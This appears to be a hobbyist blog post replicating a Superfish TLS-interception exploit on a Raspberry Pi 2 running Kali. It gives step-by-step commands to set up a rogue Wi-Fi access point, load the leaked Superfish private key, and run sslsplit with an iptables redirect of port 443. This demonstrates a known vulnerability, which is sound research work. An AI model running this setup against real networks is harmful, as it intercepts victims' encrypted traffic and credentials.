Robert Graham wrote a handy guide for a Superfish Exploit using Raspbian on a Raspberry Pi 2 (RP2). He mentioned wanting to run it on Kali instead so I decided to take that for a spin. Here are the steps. It took me about 20 minutes to get everything running.

---

A: Preparation of kali

1. Download kali image (462.5MB) provided by @essobi
2. Extract kali-0.1-rpi.img.xz – I used 7-zip

MD5: 277ac5f1cc2321728b2e5dcbf51ac7ef 
SHA-1: d45ddaf2b367ff5b153368df14b6a781cded09f6

3. Write kali-0.1-rpi.img to SD – I used Win32DiskImager
4. Insert the SD to RP2, connect network and power-up
5. SSH to kali using default user:password (root:toor)

---

B: Configuration of kali. In brief, I changed the default password and added a user account. I gave the new account sudo rights, then I logged out and back in as the new user. After that I updated kali for pi (rpi-update) and changed the ssh keys.

1. root@kali:~$ passwd
2. root@kali:~$ adduser davi
3. root@kali:~$ visudo
4. davi@kali:~$ sudo apt-get install curl
5. davi@kali:~$ sudo apt-get update && sudo apt-get upgrade
6. davi@kali:~$ sudo wget https://raw.githubusercontent.com/Hexxeh/rpi-update/master/rpi-update -O /usr/bin/rpi-update
7. davi@kali:~$ sudo chmod 755 /usr/bin/rpi-update
8. davi@kali:~$ sudo rpi-update
9. root@kali:~$ sudo dpkg-reconfigure openssh-server
10. davi@kali:~$ sudo reboot

---

C: Configuration of network as Robert did – follow the elinux guide for details on how to edit the files.

1. davi@kali:~$ sudo apt-get install hostapd udhcpd
2. davi@kali:~$ sudo vi /etc/default/udhcpd
3. davi@kali:~$ sudo ifconfig wlan0 192.168.42.1
4. davi@kali:~$ sudo vi /etc/network/interfaces
5. davi@kali:~$ sudo vi /etc/hostapd/hostapd.conf
6. davi@kali:~$ sudo sh -c “echo 1 > /proc/sys/net/ipv4/ip_forward”
7. davi@kali:~$ sudo vi /etc/sysctl.conf
8. davi@kali:~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
9. davi@kali:~$ sudo iptables -A FORWARD -i eth0 -o wlan0 -m state –state RELATED,ESTABLISHED -j ACCEPT
10. davi@kali:~$ sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
11. davi@kali:~$ sudo sh -c “iptables-save > /etc/iptables.ipv4.nat”
12. davi@kali:~$ sudo vi /etc/network/interfaces
13. davi@kali:~$ sudo service hostapd start
14. davi@kali:~$ sudo service udhcpd start
15. davi@kali:~$ sudo update-rc.d hostapd enable
16. davi@kali:~$ sudo update-rc.d udhcpd enable

For example if instead of a static address you wanted the interface to grab a dynamic one:

• davi@kali:~$ sudo vi /etc/network/interfaces auto wlan0

iface wlan0 inet dhcp
wpa-ssid "SSID"
wpa-psk "passphrase"

---

D: Configuration for Superfish Exploit. These commands follow Robert’s. I downloaded his test.pem file, duplicated it into a certificate file and then used vi to remove the redundant bits.

1. davi@kali:~$ wget https://github.com/robertdavidgraham/pemcrack/blob/master/test.pem
2. davi@kali:~$ cp test.pem ca.crt
3. davi@kali:~$ vi test.pem
4. davi@kali:~$ vi ca.crt
5. davi@kali:~$ openssl rsa -in test.pem -out ca.key
6. davi@kali:~$ sudo apt-get install sslsplit
7. davi@kali:~$ mkdir /var/log/sslsplit
8. davi@kali:~$ sslsplit -D -l connections.log -S /var/log/sslsplit -k ca.key -c ca.crt ssl 0.0.0.0 8443 &
9. davi@kali:~$ sudo iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT –to-ports 8443

---

Obviously Robert did hard work figuring this out. I’ve just tested the basics to see what it would take to setup a Kali instance. If I test further or script it I’ll update this page. Also perhaps I should mention I have a couple hardware differences from Robert’s guide:

• RP2. Cost: $35
• 32GB SanDisk micro SD (which is FAR larger than necessary). Cost: $18
• Edimax EW-7811Un wireless USB able to do “infrastructure mode”. Cost $10

Total cost: (re-purposed from other projects) $35 + $18 + $10 = $63
Total time: 20 minutes

---

Because I used such a large SD card, and the Kali image was so small, I also resized the partitions to make use of all that extra space.

Check starting use percentages:

• davi@kali:~$ df -k

Filesystem     1K-blocks    Used Available Use% Mounted on
rootfs           2896624 1664684   1065084  61% /
/dev/root        2896624 1664684   1065084  61% /
devtmpfs          470368       0    470368   0% /dev
tmpfs              94936     460     94476   1% /run
tmpfs               5120       0      5120   0% /run/lock
tmpfs             189860       0    189860   0% /run/shm

Resize the partition

1. davi@kali:~$ sudo fdisk /dev/mmcblk0
2. type “p” (print partition table and NOTE START NUMBER FOR PARTITION 2)
3. type “d” (delete partition)
4. type “2” (second partition)
5. type “n” (new partition)
6. type “p” (primary partition)
7. type “2” (second partition)
8. hit “enter” to select default start number (SHOULD MATCH START NUMBER NOTED)
9. hit “enter” to select default end number
10. type “w” (write partition table)
11. davi@kali:~$ sudo reboot
12. davi@kali:~$ sudo resize2fs /dev/mmcblk0p2

Check finished use percentages:

• davi@kali:~$ df -k

Filesystem     1K-blocks    Used Available Use% Mounted on
rootfs          30549476 1668420  27590636   6% /
/dev/root       30549476 1668420  27590636   6% /
devtmpfs          470368       0    470368   0% /dev
tmpfs              94936     464     94472   1% /run
tmpfs               5120       0      5120   0% /run/lock
tmpfs             189860       0    189860   0% /run/shm